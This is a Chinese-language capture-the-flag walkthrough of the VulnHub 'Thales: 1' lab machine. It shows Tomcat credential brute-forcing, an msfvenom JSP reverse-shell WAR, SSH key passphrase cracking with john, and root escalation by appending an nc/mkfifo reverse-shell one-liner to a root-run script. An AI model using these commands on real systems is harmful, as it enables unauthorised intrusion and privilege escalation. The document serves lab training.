前期準備：

靶機地址：https://www.vulnhub.com/entry/thales-1,749/

這個靶機和之前的靶機一樣，獲取不到 DHCP 地址，進入系統（網上有很多忘記密碼進入系統的方法）檢視時發現，“i” 輸入時會出現以下這種情況：

而且很多輸入的字元都混亂了：

這些都亂了，沒有“i”字元，那更改網絡卡就很麻煩，“vi”，“vim”都用不了，那就只能試試 nano 編輯器：

之前的網絡卡都是 ens33 所以推測這個靶機的網絡卡也是 ens33，修改完成後 Ctrl+x 退出，y 儲存，然後直接回車即可：

重啟一下服務，獲取到了地址：

kali攻擊機IP：192.168.11.129
靶機地址：192.168.11.176

一、資訊收集

1.使用nmap對目標靶機進行掃描

nmap -A -p 1-65535 192.168.11.176

發現開放了22和8080埠

2.收集頁面資訊

訪問8080埠：

發現是個 tomcat 頁面，有登入視窗：

3.爆破 Tomcat

使用msf爆破一下：

設定目標靶機並進行爆破：

解得：tomcat:role1

二、漏洞攻擊

1.上傳shell檔案

登入進去看一下：

點選 Server Status 再次輸入使用者名稱密碼：

在 List Applications 頁面發現可以上傳檔案的地方：

那就上傳一個反彈shell試試,建立反彈shell Tomcat - HackTricks

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.11.129 LPORT=1234 -f war -o revshell.war

上傳檔案訪問並監聽：

nc連線成功，

2.收集使用者 Tomcat 的資訊

檢視一下是 python2 還是 python3：

是 python3 ，寫入互動式shell：

python3 -c 'import pty;pty.spawn("/bin/bash")'

檢視一下許可權：

不是之前發現的密碼，那就看一下其他的資訊：

在 /home 目錄下發現了一些資訊：

發現 backup.sh 檔案可以執行系統指令：

user.txt 檔案沒有許可權檢視，除此之外還發現了 .ssh 檔案：

發現有私鑰，那就可以用 ssh2john.py 生成密碼檔案然後爆破，儲存祕鑰到本地：

用 ssh2john.py 指令碼編譯一下：

/usr/share/john/ssh2john.py id_rsa > crack.txt

爆破：

john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

解得密碼為：vodka06。

3.收集使用者 thales 的資訊

在 nc 連線的 tomcat 中切換 thales 使用者：

切換成功，檢視一下 /home 目錄下的資訊：

user.txt 檔案中有字串，md5解碼：

能解出，要收費，先看 notes.txt 檔案中的資訊，剛才發現也沒有利用：

可以看出是root執行的，檢視檔案許可權：

發現我們讀寫執行都可以。

三、提權

在其中新增反彈shell（一些反彈shell可以參考 pentestmonkey 網站上的）：

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.129 1235 >/tmp/f" >> backup.sh

用 nc 監聽 1235 埠，等了一會就連上了：

獲得了root。